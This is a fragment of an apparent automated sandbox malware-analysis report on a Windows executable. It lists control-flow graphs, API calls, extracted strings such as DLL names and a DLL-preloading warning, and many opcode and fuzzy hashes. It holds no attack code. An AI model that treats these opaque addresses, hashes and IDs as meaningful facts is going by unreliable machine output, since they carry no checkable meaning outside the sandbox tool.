                          • Instruction Fuzzy Hash: BAE27362F0C6C252EA66FB25D1403EEE7A1FB82784F444132DA9D97AA5EF3CE455C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: CMT
                          • API String ID: 3668304517-2756464174
                          • Opcode ID: de8abfa7229b1edd29109abd571571e97c9e15b363706f80c43edb19f81fb34c
                          • Instruction ID: dac51457e7d78f3d12dc1ad2b834a00f98a7b10a4e5089d722b640048f094df2
                          • Opcode Fuzzy Hash: de8abfa7229b1edd29109abd571571e97c9e15b363706f80c43edb19f81fb34c
                          • Instruction Fuzzy Hash: 91E2F022F0C68286EB1AFB65D5542FDA7A1FB46788F440035DA5E87B96EF3CE154C380

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3714 7ff64d3340bc-7ff64d3340f3 3715 7ff64d3340f9-7ff64d334101 3714->3715 3716 7ff64d3341d2-7ff64d3341df FindNextFileW 3714->3716 3717 7ff64d334106-7ff64d334118 FindFirstFileW 3715->3717 3718 7ff64d334103 3715->3718 3719 7ff64d3341e1-7ff64d3341f1 GetLastError 3716->3719 3720 7ff64d3341f3-7ff64d3341f6 3716->3720 3717->3720 3723 7ff64d33411e-7ff64d334146 call 7ff64d336a0c 3717->3723 3718->3717 3724 7ff64d3341ca-7ff64d3341cd 3719->3724 3721 7ff64d3341f8-7ff64d334200 3720->3721 3722 7ff64d334211-7ff64d334253 call 7ff64d35797c call 7ff64d32129c call 7ff64d338090 3720->3722 3726 7ff64d334205-7ff64d33420c call 7ff64d3220b0 3721->3726 3727 7ff64d334202 3721->3727 3750 7ff64d33428c-7ff64d3342e6 call 7ff64d33f168 * 3 3722->3750 3751 7ff64d334255-7ff64d33426c 3722->3751 3734 7ff64d334148-7ff64d334164 FindFirstFileW 3723->3734 3735 7ff64d334167-7ff64d334170 3723->3735 3729 7ff64d3342eb-7ff64d33430e call 7ff64d352320 3724->3729 3726->3722 3727->3726 3734->3735 3738 7ff64d3341a9-7ff64d3341ad 3735->3738 3739 7ff64d334172-7ff64d334189 3735->3739 3738->3720 3743 7ff64d3341af-7ff64d3341be GetLastError 3738->3743 3741 7ff64d33418b-7ff64d33419e 3739->3741 3742 7ff64d3341a4 call 7ff64d35220c 3739->3742 3741->3742 3745 7ff64d334315-7ff64d33431b call 7ff64d357904 3741->3745 3742->3738 3747 7ff64d3341c8 3743->3747 3748 7ff64d3341c0-7ff64d3341c6 3743->3748 3747->3724 3748->3724 3748->3747 3750->3729 3754 7ff64d334287 call 7ff64d35220c 3751->3754 3755 7ff64d33426e-7ff64d334281 3751->3755 3754->3750 3755->3754 3758 7ff64d33430f-7ff64d334314 call 7ff64d357904 3755->3758 3758->3745
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                          • String ID:
                          • API String ID: 474548282-0
                          • Opcode ID: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
                          • Instruction ID: 329f8800ddcd86593a7afdc529553bdb95ae15bc08686d1ae01af9ca15e54d7b
                          • Opcode Fuzzy Hash: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
                          • Instruction Fuzzy Hash: F061A462E0CA4681EA11FB64E94427DA361FF967B4F505331EAAD83AD9EF3CD544C700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3825 7ff64d325e24-7ff64d326129 call 7ff64d33833c call 7ff64d3385f0 3831 7ff64d32612e-7ff64d326132 3825->3831 3832 7ff64d326141-7ff64d326171 call 7ff64d3383d8 call 7ff64d338570 call 7ff64d338528 3831->3832 3833 7ff64d326134-7ff64d32613c call 7ff64d326fcc 3831->3833 3851 7ff64d326177-7ff64d326179 3832->3851 3852 7ff64d326973-7ff64d326976 call 7ff64d32466c 3832->3852 3838 7ff64d32697b 3833->3838 3840 7ff64d32697e-7ff64d326985 3838->3840 3842 7ff64d326987-7ff64d326998 3840->3842 3843 7ff64d3269b4-7ff64d3269e3 call 7ff64d352320 3840->3843 3845 7ff64d32699a-7ff64d3269ad 3842->3845 3846 7ff64d3269af call 7ff64d35220c 3842->3846 3845->3846 3849 7ff64d3269e4-7ff64d3269e9 call 7ff64d357904 3845->3849 3846->3843 3859 7ff64d3269ea-7ff64d3269ef call 7ff64d357904 3849->3859 3851->3852 3855 7ff64d32617f-7ff64d326189 3851->3855 3852->3838 3855->3852 3857 7ff64d32618f-7ff64d326192 3855->3857 3857->3852 3860 7ff64d326198-7ff64d3261aa call 7ff64d3385f0 3857->3860 3866 7ff64d3269f0-7ff64d3269f7 call 7ff64d357904 3859->3866 3860->3833 3865 7ff64d3261ac-7ff64d3261fd call 7ff64d3384f8 call 7ff64d338528 * 2 3860->3865 3875 7ff64d32623f-7ff64d326249 3865->3875 3876 7ff64d3261ff-7ff64d326222 call 7ff64d32466c call 7ff64d32ba0c 3865->3876 3877 7ff64d326266-7ff64d326270 3875->3877 3878 7ff64d32624b-7ff64d326260 call 7ff64d338528 3875->3878 3876->3875 3893 7ff64d326224-7ff64d32622e call 7ff64d32433c 3876->3893 3881 7ff64d32627e-7ff64d326296 call 7ff64d32334c 3877->3881 3882 7ff64d326272-7ff64d32627b call 7ff64d338528 3877->3882 3878->3852 3878->3877 3891 7ff64d326298-7ff64d32629b 3881->3891 3892 7ff64d3262b3 3881->3892 3882->3881 3891->3892 3894 7ff64d32629d-7ff64d3262b1 3891->3894 3895 7ff64d3262b6-7ff64d3262c8 3892->3895 3893->3875 3894->3892 3894->3895 3897 7ff64d3268b7-7ff64d326929 call 7ff64d334d04 call 7ff64d338528 3895->3897 3898 7ff64d3262ce-7ff64d3262d1 3895->3898 3917 7ff64d326936 3897->3917 3918 7ff64d32692b-7ff64d326934 call 7ff64d338528 3897->3918 3900 7ff64d3262d7-7ff64d3262da 3898->3900 3901 7ff64d326481-7ff64d3264f4 call 7ff64d334c74 call 7ff64d338528 * 2 3898->3901 3900->3901 3902 7ff64d3262e0-7ff64d3262e3 3900->3902 3931 7ff64d326507-7ff64d326533 call 7ff64d338528 3901->3931 3932 7ff64d3264f6-7ff64d326500 3901->3932 3905 7ff64d32632e-7ff64d326353 call 7ff64d338528 3902->3905 3906 7ff64d3262e5-7ff64d3262e8 3902->3906 3921 7ff64d32639e-7ff64d3263c5 call 7ff64d338528 call 7ff64d338384 3905->3921 3922 7ff64d326355-7ff64d32638f call 7ff64d324228 call 7ff64d323c84 call 7ff64d32701c call 7ff64d321fa0 3905->3922 3909 7ff64d32696d-7ff64d326971 3906->3909 3910 7ff64d3262ee-7ff64d326329 call 7ff64d338528 3906->3910 3909->3840 3910->3909 3924 7ff64d326939-7ff64d326946 3917->3924 3918->3924 3944 7ff64d3263c7-7ff64d326400 call 7ff64d324228 call 7ff64d323c84 call 7ff64d32701c call 7ff64d321fa0 3921->3944 3945 7ff64d326402-7ff64d32641f call 7ff64d338444 3921->3945 3968 7ff64d326390-7ff64d326399 call 7ff64d321fa0 3922->3968 3929 7ff64d326948-7ff64d32694a 3924->3929 3930 7ff64d32694c 3924->3930 3929->3930 3935 7ff64d32694f-7ff64d326959 3929->3935 3930->3935 3946 7ff64d326549-7ff64d326557 3931->3946 3947 7ff64d326535-7ff64d326544 call 7ff64d3383d8 call 7ff64d33f134 3931->3947 3932->3931 3935->3909 3939 7ff64d32695b-7ff64d326968 call 7ff64d324840 3935->3939 3939->3909 3944->3968 3964 7ff64d326421-7ff64d32646f call 7ff64d338444 * 2 call 7ff64d33c800 call 7ff64d354a70 3945->3964 3965 7ff64d326475-7ff64d32647c 3945->3965 3949 7ff64d326559-7ff64d32656c call 7ff64d3383d8 3946->3949 3950 7ff64d326572-7ff64d326595 call 7ff64d338528 3946->3950 3947->3946 3949->3950 3969 7ff64d326597-7ff64d32659e 3950->3969 3970 7ff64d3265a0-7ff64d3265b0 3950->3970 3964->3965 3965->3909 3968->3921 3974 7ff64d3265b3-7ff64d3265eb call 7ff64d338528 * 2 3969->3974 3970->3974 3989 7ff64d3265f6-7ff64d3265fa 3974->3989 3990 7ff64d3265ed-7ff64d3265f4 3974->3990 3992 7ff64d326603-7ff64d326632 3989->3992 3994 7ff64d3265fc 3989->3994 3990->3992 3995 7ff64d32663f 3992->3995 3996 7ff64d326634-7ff64d326638 3992->3996 3994->3992 3998 7ff64d326641-7ff64d326656 3995->3998 3996->3995 3997 7ff64d32663a-7ff64d32663d 3996->3997 3997->3998 3999 7ff64d326658-7ff64d32665b 3998->3999 4000 7ff64d3266ca 3998->4000 3999->4000 4001 7ff64d32665d-7ff64d326683 3999->4001 4002 7ff64d3266d2-7ff64d326731 call 7ff64d323d00 call 7ff64d338444 call 7ff64d340d54 4000->4002 4001->4002 4003 7ff64d326685-7ff64d3266a9 4001->4003 4013 7ff64d326733-7ff64d326740 call 7ff64d324840 4002->4013 4014 7ff64d326745-7ff64d326749 4002->4014 4005 7ff64d3266ab 4003->4005 4006 7ff64d3266b2-7ff64d3266bf 4003->4006 4005->4006 4006->4002 4008 7ff64d3266c1-7ff64d3266c8 4006->4008 4008->4002 4013->4014 4016 7ff64d32675b-7ff64d326772 call 7ff64d35797c 4014->4016 4017 7ff64d32674b-7ff64d326756 call 7ff64d32473c 4014->4017 4023 7ff64d326777-7ff64d32677e 4016->4023 4024 7ff64d326774 4016->4024 4022 7ff64d326859-7ff64d326860 4017->4022 4025 7ff64d326873-7ff64d32687b 4022->4025 4026 7ff64d326862-7ff64d326872 call 7ff64d32433c 4022->4026 4027 7ff64d326780-7ff64d326783 4023->4027 4028 7ff64d3267a3-7ff64d3267ba call 7ff64d35797c 4023->4028 4024->4023 4025->3909 4031 7ff64d326881-7ff64d326892 4025->4031 4026->4025 4032 7ff64d32679c 4027->4032 4033 7ff64d326785 4027->4033 4041 7ff64d3267bc 4028->4041 4042 7ff64d3267bf-7ff64d3267c6 4028->4042 4037 7ff64d3268ad-7ff64d3268b2 call 7ff64d35220c 4031->4037 4038 7ff64d326894-7ff64d3268a7 4031->4038 4032->4028 4034 7ff64d326788-7ff64d326791 4033->4034 4034->4028 4040 7ff64d326793-7ff64d32679a 4034->4040 4037->3909 4038->3866 4038->4037 4040->4032 4040->4034 4041->4042 4042->4022 4044 7ff64d3267cc-7ff64d3267cf 4042->4044 4045 7ff64d3267e8-7ff64d3267f0 4044->4045 4046 7ff64d3267d1 4044->4046 4045->4022 4048 7ff64d3267f2-7ff64d326826 call 7ff64d338360 call 7ff64d338598 call 7ff64d338528 4045->4048 4047 7ff64d3267d4-7ff64d3267dd 4046->4047 4047->4022 4049 7ff64d3267df-7ff64d3267e6 4047->4049 4048->4022 4056 7ff64d326828-7ff64d326839 4048->4056 4049->4045 4049->4047 4057 7ff64d32683b-7ff64d32684e 4056->4057 4058 7ff64d326854 call 7ff64d35220c 4056->4058 4057->3859 4057->4058 4058->4022
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID:
                          • String ID: CMT
                          • API String ID: 0-2756464174
                          • Opcode ID: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
                          • Instruction ID: 58c7ea2d2455fed6b7aa6e985e0fe4d3f25b2001d552d2fd5d86ecbf81eb0e69
                          • Opcode Fuzzy Hash: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
                          • Instruction Fuzzy Hash: 0042CE62F0C68296EB1AFB74D1502FDA7A1EF52748F400136DB5E93696EF38E558C380

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ff64d33dfd0-7ff64d33e024 call 7ff64d352450 GetModuleHandleW 3 7ff64d33e026-7ff64d33e039 GetProcAddress 0->3 4 7ff64d33e07b-7ff64d33e3a5 0->4 5 7ff64d33e03b-7ff64d33e04a 3->5 6 7ff64d33e053-7ff64d33e066 GetProcAddress 3->6 7 7ff64d33e3ab-7ff64d33e3b4 call 7ff64d35b788 4->7 8 7ff64d33e503-7ff64d33e521 call 7ff64d336454 call 7ff64d337df4 4->8 5->6 6->4 11 7ff64d33e068-7ff64d33e078 6->11 7->8 14 7ff64d33e3ba-7ff64d33e3fd call 7ff64d336454 CreateFileW 7->14 20 7ff64d33e525-7ff64d33e52f call 7ff64d3351a4 8->20 11->4 21 7ff64d33e4f0-7ff64d33e4fe CloseHandle call 7ff64d321fa0 14->21 22 7ff64d33e403-7ff64d33e416 SetFilePointer 14->22 27 7ff64d33e531-7ff64d33e53c call 7ff64d33dd88 20->27 28 7ff64d33e564-7ff64d33e5ac call 7ff64d35797c call 7ff64d32129c call 7ff64d338090 call 7ff64d321fa0 call 7ff64d3332bc 20->28 21->8 22->21 24 7ff64d33e41c-7ff64d33e43e ReadFile 22->24 24->21 29 7ff64d33e444-7ff64d33e452 24->29 27->28 38 7ff64d33e53e-7ff64d33e562 CompareStringW 27->38 71 7ff64d33e5b1-7ff64d33e5b4 28->71 32 7ff64d33e458-7ff64d33e4ac call 7ff64d35797c call 7ff64d32129c 29->32 33 7ff64d33e800-7ff64d33e807 call 7ff64d352624 29->33 50 7ff64d33e4c3-7ff64d33e4d9 call 7ff64d33d0a0 32->50 38->28 42 7ff64d33e5bd-7ff64d33e5c6 38->42 42->20 45 7ff64d33e5cc 42->45 48 7ff64d33e5d1-7ff64d33e5d4 45->48 52 7ff64d33e5d6-7ff64d33e5d9 48->52 53 7ff64d33e63f-7ff64d33e642 48->53 60 7ff64d33e4db-7ff64d33e4eb call 7ff64d321fa0 * 2 50->60 61 7ff64d33e4ae-7ff64d33e4be call 7ff64d33dd88 50->61 58 7ff64d33e5dd-7ff64d33e62d call 7ff64d35797c call 7ff64d32129c call 7ff64d338090 call 7ff64d321fa0 call 7ff64d3332bc 52->58 56 7ff64d33e648-7ff64d33e65b call 7ff64d337eb0 call 7ff64d3351a4 53->56 57 7ff64d33e7c2-7ff64d33e7ff call 7ff64d321fa0 * 2 call 7ff64d352320 53->57 82 7ff64d33e706-7ff64d33e753 call 7ff64d33da98 AllocConsole 56->82 83 7ff64d33e661-7ff64d33e701 call 7ff64d33dd88 * 2 call 7ff64d33aae0 call 7ff64d33da98 call 7ff64d33aae0 call 7ff64d33dc2c call 7ff64d3487ac call 7ff64d3219e0 56->83 106 7ff64d33e63c 58->106 107 7ff64d33e62f-7ff64d33e638 58->107 60->21 61->50 76 7ff64d33e5b6 71->76 77 7ff64d33e5ce 71->77 76->42 77->48 94 7ff64d33e7b0 82->94 95 7ff64d33e755-7ff64d33e7aa GetCurrentProcessId AttachConsole call 7ff64d33e868 call 7ff64d33e858 GetStdHandle WriteConsoleW Sleep FreeConsole 82->95 97 7ff64d33e7b4-7ff64d33e7bb call 7ff64d3219e0 ExitProcess 83->97 94->97 95->94 106->53 107->58 112 7ff64d33e63a 107->112 112->53
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                          • API String ID: 1496594111-2013832382
                          • Opcode ID: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                          • Instruction ID: 4821afe1ab80a312fed13026c1d4568a662123838a98d5a174ed7e3cd05014d9
                          • Opcode Fuzzy Hash: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                          • Instruction Fuzzy Hash: 5532D831E0DB8295EB22BF60E8401E9B3A4FF4A358F501236DA4D96BA5FF38D655C350
                          APIs
                            • Part of subcall function 00007FF64D338E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D338F8D
                          • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF64D339F75
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33A42F
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33A435
                            • Part of subcall function 00007FF64D340BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF64D340B44), ref: 00007FF64D340BE9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                          • API String ID: 3629253777-3268106645
                          • Opcode ID: bfd9826349ba550d8c78124b786cfa0a6bd1f1a0566aa61a924ec97ec8e1947b
                          • Instruction ID: 8f696c708c74ad71b8eb4370bf85c38eca99089d9d96fe382e9c99981945b8aa
                          • Opcode Fuzzy Hash: bfd9826349ba550d8c78124b786cfa0a6bd1f1a0566aa61a924ec97ec8e1947b
                          • Instruction Fuzzy Hash: CD62AE22E1D68295EB22FB24D6542BDA365FB43788F805131DA5E87E95FF3CE544C340

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1911 7ff64d351900-7ff64d351989 call 7ff64d351558 1914 7ff64d35198b-7ff64d3519af call 7ff64d351868 RaiseException 1911->1914 1915 7ff64d3519b4-7ff64d3519d1 1911->1915 1923 7ff64d351bb8-7ff64d351bd5 1914->1923 1917 7ff64d3519e6-7ff64d3519ea 1915->1917 1918 7ff64d3519d3-7ff64d3519e4 1915->1918 1919 7ff64d3519ed-7ff64d3519f9 1917->1919 1918->1919 1921 7ff64d351a1a-7ff64d351a1d 1919->1921 1922 7ff64d3519fb-7ff64d351a0d 1919->1922 1924 7ff64d351a23-7ff64d351a26 1921->1924 1925 7ff64d351ac4-7ff64d351acb 1921->1925 1931 7ff64d351b89-7ff64d351b93 1922->1931 1932 7ff64d351a13 1922->1932 1929 7ff64d351a3d-7ff64d351a52 LoadLibraryExA 1924->1929 1930 7ff64d351a28-7ff64d351a3b 1924->1930 1927 7ff64d351acd-7ff64d351adc 1925->1927 1928 7ff64d351adf-7ff64d351ae2 1925->1928 1927->1928 1933 7ff64d351ae8-7ff64d351aec 1928->1933 1934 7ff64d351b85 1928->1934 1935 7ff64d351aa9-7ff64d351ab2 1929->1935 1936 7ff64d351a54-7ff64d351a67 GetLastError 1929->1936 1930->1929 1930->1935 1943 7ff64d351b95-7ff64d351ba6 1931->1943 1944 7ff64d351bb0 call 7ff64d351868 1931->1944 1932->1921 1941 7ff64d351b1b-7ff64d351b2e GetProcAddress 1933->1941 1942 7ff64d351aee-7ff64d351af2 1933->1942 1934->1931 1937 7ff64d351abd 1935->1937 1938 7ff64d351ab4-7ff64d351ab7 FreeLibrary 1935->1938 1945 7ff64d351a69-7ff64d351a7c 1936->1945 1946 7ff64d351a7e-7ff64d351aa4 call 7ff64d351868 RaiseException 1936->1946 1937->1925 1938->1937 1941->1934 1948 7ff64d351b30-7ff64d351b43 GetLastError 1941->1948 1942->1941 1949 7ff64d351af4-7ff64d351aff 1942->1949 1943->1944 1951 7ff64d351bb5 1944->1951 1945->1935 1945->1946 1946->1923 1953 7ff64d351b5a-7ff64d351b81 call 7ff64d351868 RaiseException call 7ff64d351558 1948->1953 1954 7ff64d351b45-7ff64d351b58 1948->1954 1949->1941 1955 7ff64d351b01-7ff64d351b08 1949->1955 1951->1923 1953->1934 1954->1934 1954->1953 1955->1941 1958 7ff64d351b0a-7ff64d351b0f 1955->1958 1958->1941 1961 7ff64d351b11-7ff64d351b19 1958->1961 1961->1934 1961->1941
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                          • String ID: H
                          • API String ID: 3432403771-2852464175
                          • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                          • Instruction ID: 2a53351f6af9c7f5da72d45a282f79cd4c3642c654b275afddcf7140e438eaf0
                          • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                          • Instruction Fuzzy Hash: DA916922E08B528AEB52EF65D8942ACB3B1BB0AB98F044435DE0D57744FF78E845C340

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                          • String ID: PNG
                          • API String ID: 541704414-364855578
                          • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                          • Instruction ID: dd321bc0011118fb08b6ad3e0326daa0972f47e2d3ce6d6de5fe706bd931d323
                          • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                          • Instruction Fuzzy Hash: 66410725F1DA0282EA16BF56D864379A7A0AF8ABD4F084435DE0D873A4FE7DE449C700

                          Control-flow Graph

                          • Executed
                          • Not Executed
